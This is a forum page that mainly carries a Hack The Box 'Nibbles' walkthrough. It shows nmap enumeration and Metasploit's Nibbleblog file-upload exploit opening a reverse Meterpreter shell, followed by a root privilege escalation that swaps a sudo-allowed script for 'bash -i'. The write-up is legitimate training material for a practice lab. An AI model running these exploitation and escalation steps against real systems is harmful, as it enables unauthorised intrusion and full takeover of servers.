Преминете към съдържанието

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

Търсене в общността

Showing results for tags 'nibbles'.

  • Търти по таг

    Напиши таг и в края сложи запетая
  • Търси по автор

Тип на съдържание


Форум

  • ЗА ФОРУМА / ABOUT THE FORUM
    • Условия за ползване, препоръки и работа с форумите
  • ИНФОРМАЦИОННА СИГУРНОСТ / INFORMATION SECURITY
    • Пенетрейшън тестове
    • Тестове за социално инженерство
    • Експлойти
    • Инструменти
    • Вируси
    • Програмиране
    • Криптография
    • Сертифициране
    • След дъжд-качулка :)
    • Безжични мрежи, мобилни устройства и друг хардуер
    • Роботика и Дронове
    • Физическа сигурност
    • Поверителност | Privacy
  • Ресурси / Resources
    • Новини: По света и у нас
    • Уроци
    • Състезания за хакери
    • Книги, филми, списания
    • Интересни събития
  • ДРУГИ / OTHERS
    • Кариерно развитие
    • Продавалник (Купува/Продава, Търси/Предлага)
    • Съответствие, наредби и стандарти
    • Уеб дизайн
    • Оф-Топик
  • Булхак Академи на Кали Линукс
  • Bodyguard and Security Association на Общи условия

Блогове

  • Булхак Академи на Видеа - YouTube
  • Булхак Академи на HTB - WriteUps
  • Bodyguard and Security Association на Блог

Намери резултати в...

Намери резултати които съдържат...


дата на създаване

  • Start

    Край


Последно обновено

  • Start

    Край


Filter by number of...

Регистриран

  • Start

    Край


Група


За мен


Telegram


Уебсайт


Фейсбук


Интереси


Локация

  1. h3xu

    Nibbles

    # Enumeration ## NMAP The nmap scan reveals 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ## Let's see what's the WebApp like. We're greeted by a ***Hello World!*** message. ![[Pasted image 20210409152510.png]] The source code of the page reveals a directory:![[Pasted image 20210409152620.png]] ## Dirbuster Using dirbuster, I have found files within /nibbleblog/content/private/config.xml directory and was able to enumerate possible users:![[Pasted image 20210409152955.png]] I also found a feed.php file which let me into researching if it was a possible attack vector. The research led me into finding this interesting article about feed.php and XSS.[feed injection in web](https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/EN-Feed%20Injection%20In%20Web%202.0.pdf) Anyway.. while it was interesting find, I did not see how it would apply here. So i continued looking. ## Searchsploit I was going nowhere until i simply typed: searchsploit nibble --------------------------------------------------------------------------------------------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------- --------------------------------- Nibbleblog 3 - Multiple SQL Injections | php/webapps/35865.txt Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | php/remote/38489.rb ----------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Ahh, it looks we have hit. Let's try metasploit: msf6 > search nibble Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nibbleblog_file_upload I have used the previously enumerated username:password == admin:nibbles: msf6 exploit(multi/http/nibbleblog_file_upload) > exploit [*] Started reverse TCP handler on 10.10.14.6:4444 [*] Sending stage (39282 bytes) to 10.10.10.75 [+] Deleted image.php [*] Meterpreter session 2 opened (10.10.14.6:4444 -> 10.10.10.75:32812) at 2021-04-09 08:00:26 -0400 In the following lines I am interacting with the shell. Finally I have discovered interesting file that is with 777 rights. meterpreter > shell Process 1587 created. Channel 0 created. whoami nibbler python3 -c 'import pty;pty.spawn("/bin/bash")' nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler <ml/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler nibbler@Nibbles:/home/nibbler$ ls ls personal.zip user.txt nibbler@Nibbles:/home/nibbler$ unzip personal.zip unzip personal.zip Archive: personal.zip creating: personal/ creating: personal/stuff/ inflating: personal/stuff/monitor.sh nibbler@Nibbles:/home/nibbler$ cd personal/stuff/ cd personal/stuff/ nibbler@Nibbles:/home/nibbler/personal/stuff$ file monitor.sh file monitor.sh monitor.sh: ASCII text nibbler@Nibbles:/home/nibbler/personal/stuff$ ll ll ll: command not found nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la ls -la total 12 drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 . drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 .. -rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh Catting the file revealed nothing interesting tho. After some time, I tried: sudo -l Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh AHA! This is our gate to escalating privileges. I have removed the unzipped file and instead uploaded a simple bash script: nibbler@Nibbles:/home/nibbler/personal/stuff$ rm monitor.sh rm monitor.sh I could not use any editors on the machine, so i Had to create it locally and upload it to the victim. meterpreter > upload monitor.sh [*] uploading : /home/kali/Desktop/monitor.sh -> monitor.sh [*] Uploaded -1.00 B of 21.00 B (-4.76%): /home/kali/Desktop/monitor.sh -> monitor.sh [*] uploaded : /home/kali/Desktop/monitor.sh -> monitor.sh I have moved the file to ***/home/nibbler/personal/stuff*** and execute the following commands to gain root: cat monitor.sh bash -i chmod +x monitor.sh sudo /home/nibbler/personal/stuff/monitor.sh bash: cannot set terminal process group (1360): Inappropriate ioctl for device bash: no job control in this shell root@Nibbles:/home/nibbler/personal/stuff# id id uid=0(root) gid=0(root) groups=0(root)

HACKING.BG Партньори

Asset3.png.df693f7661f6e8a7a3ec208659eda80b.pngtransparent1.png.c15979e1dc997cdd3a9941e342368a9b.png2.png.3e2592eadc660ecc831f1fdd569e8eb4.png600_489534840.png.72981fb02b90f1986dd7ade4d561e6d0.pngcyberclub-logo-text.png.6e9d11752e2eade43d40337d83365e48.png

×
×
  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy